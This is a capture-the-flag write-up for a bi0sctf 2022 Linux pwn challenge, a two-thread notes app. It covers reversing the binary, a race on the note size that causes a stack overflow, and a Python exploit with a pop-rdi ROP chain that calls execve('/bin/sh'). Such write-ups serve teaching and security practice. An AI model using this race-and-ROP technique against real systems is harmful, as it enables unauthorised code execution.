Table of Contents

Challenge Intro

Justin Miller (@zolutal) and I (@mitchzks) solved this pwn challenge during bi0sctf 2022. It's a typical x86_64 Linux notes pwn challenge. The gimmick was that it used shared memory instead of the heap for data storage and two separate threads for managing the notes.

Reversing

We started by downloading the correct version of libc and ld.so. They didn't provide the exact file but the challenge binary printed a warning if you didn't load it with libc 2.34. So, I downloaded a random 64-bit libc 2.34 from bluekat and used pwninit to get the correct ld.so.

After we got the libraries setup, we ran the binary and looked around the menu.

The only interesting things there were the "encrypt/decrypt note" and the "upgrade note" options. Everything else looked like a fairly standard notes app. Next, we opened it up in IDA to see the details:

__int64 __fastcall main(__int64 argc, char **argv, char **env)
{
  pthread_t thread_1; // [rsp+0h] [rbp-30h] BYREF
  pthread_t thread_2; // [rsp+8h] [rbp-28h] BYREF
  void *shared_memory_p; // [rsp+18h] [rbp-18h]
  int shmid; // [rsp+24h] [rbp-Ch]
  key_t key; // [rsp+28h] [rbp-8h]
  int i; // [rsp+2Ch] [rbp-4h]

  setup();
  banner();
  alarm(60u);
  key = getpid();
  shmid = shmget(key, 0x800uLL, 950);
  if ( shmid == -1 )
  {
    syscall(1LL, 1LL, "Error in shmget\n", 17LL);
    return 0LL;
  }
  else
  {
    shared_memory_p = shmat(shmid, 0LL, 0);
    if ( shared_memory_p != (void *)-1LL )
    {
      memset(shared_memory_p, 0, 0x800uLL);
      *((_BYTE *)shared_memory_p + 29) = 0;
      if ( pthread_create(&thread_1, 0LL, (void *(*)(void *))thread_1_routine, shared_memory_p) )
        syscall(1LL, 1LL, "Error in creating thread 1\n", 28LL);
      if ( pthread_create(&thread_2, 0LL, (void *(*)(void *))thread_2_routine, shared_memory_p) )
        syscall(1LL, 1LL, "Error in creating thread 2\n", 28LL);
      for ( i = 0; i <= 1; ++i )
        pthread_join(*(&thread_1 + i), 0LL);
      shmdt(shared_memory_p);
      shmctl(shmid, 0, 0LL);
      syscall(1LL, 1LL, "Done!\n", 6LL);
      exit(0);
    }
    syscall(1LL, 1LL, "Error in shmat\n", 16LL);
    return 0LL;
  }
}

The app allocates a shared memory region and passes it to two separate threads. This could easily introduce a race condition. Lets look at the routine for thread 2:

void __fastcall __noreturn thread_2_routine(shared_memory *shm_addr)
{
  int v1; // [rsp+1Ch] [rbp-4h] BYREF

  print_menu();
  while ( 1 )
  {
    syscall(1LL, 1LL, "Enter Choice: ", 14LL);
    __isoc99_scanf("%d", &v1);
    switch ( v1 )
    {
      case 1:
        create_note(shm_addr);
        break;
      case 2:
        delete_note(shm_addr);
        break;
      case 3:
        print_note(shm_addr);
        break;
      case 4:
        upgrade_note(shm_addr);
        break;
      case 5:
        encrypt_note(shm_addr);
        break;
      case 6:
        exit(0);
      default:
        syscall(1LL, 1LL, "Invalid Choice\n", 15LL);
        break;
    }
  }
}

This thread was clearly running the main interactive elements of the binary. It asks the user for an action and lets them store a note, delete a note, print a note, upgrade a note (change the size), and encrypt a note. The most interesting action here is create_note, as it gives you the most control over the shared memory region.

__int64 __fastcall create_note(shared_memory *a1)
{
  __int64 result; // rax

  syscall(1LL, 1LL, "Enter Note ID: ", 15LL);
  getn((__int64)a1, 8u);
  syscall(1LL, 1LL, "Enter Note Name: ", 17LL);
  getn((__int64)a1->note_name, 0x10u);
  syscall(1LL, 1LL, "Enter Note Size: ", 17LL);
  __isoc99_scanf("%d", &a1->note_size);
  syscall(1LL, 1LL, "Enter Note Content: ", 20LL);
  getn((__int64)a1->note_contents, a1->note_size);
  result = (__int64)a1;
  a1->note_stored = 1;
  return result;
}

This lets us store a note ID, a note name, a note size, and note contents. It also doesn't check the note size, so we could make the note as large as necessary. Since the shared memory region is allocated using shmat, it's likely sitting directly on top of ld.so, meaning we could create a large note and leak some pointers from that using print_note. After writing all of the data, it returns back to the menu and lets us repeatedly perform actions on the thread.

This function gave a pretty clear view of the structure of the shared memory region. The shared_memory struct is already applied to the decompilation above, but here it is for reference:

struct shared_memory
{
  long long note_id;
  char note_name[16];
  int note_size;
  char note_stored;
  char note_encrypted;
  char field_1E[1024];
  char note_contents[994];
};

Now that we knew all of this, we looked at what thread 1 was doing:

void *__fastcall sub_401AC8(shared_memory *shared_memory)
{
  char dest[64]; // [rsp+10h] [rbp-40h] BYREF

  sleep(2u);
  if ( shared_memory->note_size >= 65u )
  {
    syscall(1LL, 1LL, "Size Limit Exceeded\n", 20LL);
    exit(0);
  }
  thread1_encrypt(shared_memory);
  sleep(1u);
  syscall(1LL, 1LL, "Sent!\n", 6LL);
  return memcpy(dest, shared_memory->note_contents, shared_memory->note_size);
}

Thread 1 will stall until a note is created (note_stored == 1) and then run this routine. The bug here is immediately obvious. Once we create a note on thread 2, this routine will be ran immediately on thread 1. We can then wait 2 seconds to get past the first note_size check, but then we will have a 1 second race to change note_size on thread 1 and overflow the stack buffer with that final memcpy call. This is an easy stack overflow, and since the binary wasn't compiled with stack canaries, gives us full RIP control.

Just to mention, thread1_encrypt isn't important at all in this bug. All it does is iterate over field_1E in the shared memory region and XOR every byte over a 16-byte block. If it actually encrypted the correct part of the shared memory region (note_contents), then we'd probably have to XOR encrypt our stack overflow contents beforehand, but since the function is encrypting the wrong data, we don't even have to think about it.

Exploitation

We started by triggering the race condition for the stack overflow. This was just as easy as we thought and only required calling create_note twice:

...
p = proc()
def store(size, content):
    p.slm(b"1")
    p.slm(b"0")
    p.slm(b"a")
    p.slm(str(size).encode())
    p.slm(content)

# create the first note to trigger the encryption routine on thread 1
store(20, "AAAAAAAAAAAAA") 

# wait for note_size race condition
sleep(3) 

# overflow stack
payload = p64(0xDEADBEEF)
store(994, b"\0"*72 + payload) 

Now that we had RIP control, we needed to figure out how to pop a shell. We had a massive overflow and PIE wasn't enabled, so we could ROP anywhere we wanted in the main binary. We originally thought about SIGROP to set the registers we needed for an execve syscall, but it ended up being much easier than that.

We needed to control rdi, *rsi, *rdx, and *rcx to call execve using the libc syscall function. When we overflow the stack, rsi pointed to a part of the shared memory region, *rdx pointed to null memory, and *rcx pointed to another memory region that we controlled. This meant we only had to control rdi so that we could set the syscall number, *rsi to "/bin/sh" for the argument to execve, and *rcx to null. Since we controlled *rsi and *rcx, the only thing we needed a ROP gadget for was rdi, and luckily that was not too difficult to find:

0x0000000000401bc0 : pop rdi ; ret

After we had that, calling execve was easy:

...
pop_rdi = p64(0x00401bc0)
syscall = p64(elf.plt["syscall"])

payload = pop_rdi + p64(0x3b) + syscall + b"\0" * 102 * 8 +  b"/bin/sh\0"

store(994, b"\0"*72 + payload)

p.ru(b"Sent!")
p.interactive()

We immediately tried it on remote and it worked first try 🙂